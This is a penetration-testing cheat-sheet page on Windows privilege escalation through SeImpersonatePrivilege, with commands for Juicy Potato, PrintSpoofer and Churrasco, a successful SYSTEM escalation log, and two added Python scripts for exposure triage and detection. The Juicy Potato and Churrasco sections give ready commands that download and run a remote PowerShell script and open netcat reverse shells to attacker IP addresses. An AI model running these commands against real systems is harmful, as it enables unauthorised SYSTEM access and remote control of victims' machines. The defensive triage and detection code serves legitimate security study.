SeTokenImpersonate

Last updated 3 years ago

How to Test? Run whoami /priv and check whether SeImpersonatePrivilege is enabled. Which tool applies depends on the Windows version and architecture:

  • Very old machines (before 2008, e.g. Windows 2003): Chimichurri, Churrasco
  • Latest and recent 64-bit: PrintSpoofer (precompiled)
  • In between these: Rotten Potato, Juicy Potato, etc., available for both 32-bit and 64-bit; then Juicy Potato / PrintSpoofer, etc.

PrintSpoofer only works on the x64 architecture; for x86, try Juicy Potato.

Reference links (the URLs are collected at the end of this page):
  • precompiled PrintSpoofer exe, x64:
  • precompiled Juicy Potato, x86:
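As an added example (not from the original page or from any of the tools it names), the following Python script parses `whoami /priv` and `systeminfo` output and reports the exposure the section above tests for: whether the current identity holds an impersonation-class privilege, and which of the page's three age brackets the host falls into. The sample outputs are constructed, and the build-number boundary between the "in between" and "latest and recent" brackets (build 17763, Windows 10 1809 / Server 2019) is taken from the Juicy Potato project's documented limit, not from this page.

```python
import re

# Privileges that let a process acquire and use another account's token.
# A privilege listed as "Disabled" is still held by the token and can be
# re-enabled by the process itself, so presence matters more than state.
IMPERSONATION_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Build at which the DCOM-based potato variants stop working (Windows 10 1809 /
# Server 2019). Assumption taken from the Juicy Potato README, not from this page.
MODERN_BUILD = 17763

# Constructed `whoami /priv` output for an IIS application-pool identity.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# Constructed `systeminfo` excerpts for two hosts of different age.
SAMPLE_SYSTEMINFO_2012 = """\
Host Name:                 WEB01
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
"""
SAMPLE_SYSTEMINFO_2003 = """\
Host Name:                 OLDWEB
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
System Type:               X86-based PC
"""

PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")
OS_VERSION = re.compile(r"^OS Version:\s+(\d+)\.(\d+)\.(\d+)", re.MULTILINE)
SYSTEM_TYPE = re.compile(r"^System Type:\s+(x64|x86)", re.MULTILINE | re.IGNORECASE)


def parse_whoami_priv(text):
    """Map privilege name -> 'Enabled'/'Disabled' from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def parse_systeminfo(text):
    """Return (major, minor, build, arch) from `systeminfo` output."""
    v = OS_VERSION.search(text)
    a = SYSTEM_TYPE.search(text)
    if not v or not a:
        raise ValueError("could not find OS Version / System Type lines")
    return int(v.group(1)), int(v.group(2)), int(v.group(3)), a.group(1).lower()


def age_bracket(major, minor, build):
    """Classify the host into the three brackets used on this page."""
    if major < 6:                       # NT 5.x: XP / Server 2003
        return "very old (before 2008)"
    if build < MODERN_BUILD:
        return "in between"
    return "latest and recent"


def triage(whoami_text, systeminfo_text):
    """Summarise token-impersonation exposure for one host."""
    privs = parse_whoami_priv(whoami_text)
    held = [p for p in IMPERSONATION_PRIVS if p in privs]
    enabled = [p for p in held if privs[p] == "Enabled"]
    major, minor, build, arch = parse_systeminfo(systeminfo_text)
    return {
        "held": held,
        "enabled": enabled,
        "exposed": bool(held),          # presence is enough; state can be flipped
        "os": (major, minor, build),
        "arch": arch,
        "bracket": age_bracket(major, minor, build),
    }


if __name__ == "__main__":
    for name, si in (("WEB01", SAMPLE_SYSTEMINFO_2012), ("OLDWEB", SAMPLE_SYSTEMINFO_2003)):
        r = triage(SAMPLE_WHOAMI_PRIV, si)
        print(f"{name}: exposed={r['exposed']} held={r['held']} "
              f"arch={r['arch']} bracket={r['bracket']}")
```

The check treats a privilege listed as Disabled as still held: a process can turn it back on itself, so the mitigation is to run the service under an identity that does not carry the privilege, not to leave it disabled.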

How to Use Juicy Potato?

Spawning a PowerShell reverse shell:

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.18/psrvsh.ps1')" -t * -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30}

  • -a: the command-line arguments you want to pass to the program given with -p
  • -c: a CLSID. Pick your target OS version in the CLSID list, then try the CLSIDs one by one to see which one works.

Try all of them one by one and see which one works:

JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}

JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"

Output of a successful attempt:

Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337 ......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
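Added example (not from the original page or from the Juicy Potato project): the successful run above ends with a cmd.exe running as NT AUTHORITY\SYSTEM whose parent is the tool's own process, still running as the service identity. The Python below correlates constructed process-creation records (fields named as in Sysmon Event ID 1) by parent PID and flags exactly that parent/child user mismatch. The events, image paths and PIDs are constructed, not real telemetry.

```python
# Correlate process-creation records by parent PID and flag a SYSTEM child
# whose parent runs as a service identity. Constructed data throughout.

SYSTEM_USER = "NT AUTHORITY\\SYSTEM"

# Identities that routinely hold SeImpersonatePrivilege but have no business
# creating SYSTEM processes themselves.
SERVICE_IDENTITY_PREFIXES = (
    "NT AUTHORITY\\NETWORK SERVICE",
    "NT AUTHORITY\\LOCAL SERVICE",
    "IIS APPPOOL\\",
)

# Constructed events. Image paths are illustrative only.
SAMPLE_EVENTS = [
    {"ProcessId": 400,  "ParentProcessId": 4,    "User": SYSTEM_USER,
     "Image": r"C:\Windows\System32\services.exe"},
    {"ProcessId": 1200, "ParentProcessId": 400,  "User": SYSTEM_USER,
     "Image": r"C:\Windows\System32\svchost.exe"},
    {"ProcessId": 2100, "ParentProcessId": 400,  "User": "IIS APPPOOL\\DefaultAppPool",
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe"},
    # A binary dropped into the web root, started by the app-pool identity.
    {"ProcessId": 3300, "ParentProcessId": 2100, "User": "IIS APPPOOL\\DefaultAppPool",
     "Image": r"C:\inetpub\wwwroot\upload\tool.exe"},
    # The outcome shown in the log above: a SYSTEM child of that process.
    {"ProcessId": 3400, "ParentProcessId": 3300, "User": SYSTEM_USER,
     "Image": r"C:\Windows\System32\cmd.exe"},
    # Benign: a SYSTEM service spawning a SYSTEM child.
    {"ProcessId": 3500, "ParentProcessId": 1200, "User": SYSTEM_USER,
     "Image": r"C:\Windows\System32\cmd.exe"},
]


def is_service_identity(user):
    """True for the low-privileged service identities listed above."""
    u = user.upper()
    return any(u.startswith(p.upper()) for p in SERVICE_IDENTITY_PREFIXES)


def find_token_escalations(events):
    """Return (child, parent) pairs where a SYSTEM process was created by a
    parent running as a service identity. Parent lookup is by PID here; on real
    telemetry use ProcessGuid/ParentProcessGuid to avoid PID-reuse mismatches."""
    by_pid = {e["ProcessId"]: e for e in events}
    hits = []
    for child in events:
        if child["User"].upper() != SYSTEM_USER:
            continue
        parent = by_pid.get(child["ParentProcessId"])
        if parent is not None and is_service_identity(parent["User"]):
            hits.append((child, parent))
    return hits


def describe(hit):
    """One-line alert text for a (child, parent) pair."""
    child, parent = hit
    return (f"SYSTEM process {child['Image']} (pid {child['ProcessId']}) "
            f"created by {parent['User']} via {parent['Image']} (pid {parent['ProcessId']})")


if __name__ == "__main__":
    for hit in find_token_escalations(SAMPLE_EVENTS):
        print("[ALERT]", describe(hit))
```

The rule is deliberately narrow: a SYSTEM child of a SYSTEM parent (the svchost case in the sample) is normal and is not flagged, while a SYSTEM child of an app-pool or NETWORK SERVICE parent is the hallmark of a token being handed across a privilege boundary. Expect some tuning against a host's own baseline before alerting on it in production.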

How to Use Churrasco?

churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 10.10.14.15 5353"

  • -d: the command to run; here a simple one-liner netcat reverse shell.

https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#seimpersonateprivilege-3-1-1
https://github.com/dievus/printspoofer
https://github.com/ivanitlearning/Juicy-Potato-x86/releases
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---impersonation-privileges
https://www.puckiestyle.nl/token-impersonation/
https://github.com/ohpe/juicy-potato/tree/master/CLSID
https://github.com/Re4son/Churrasco/blob/master/ReadMe.txt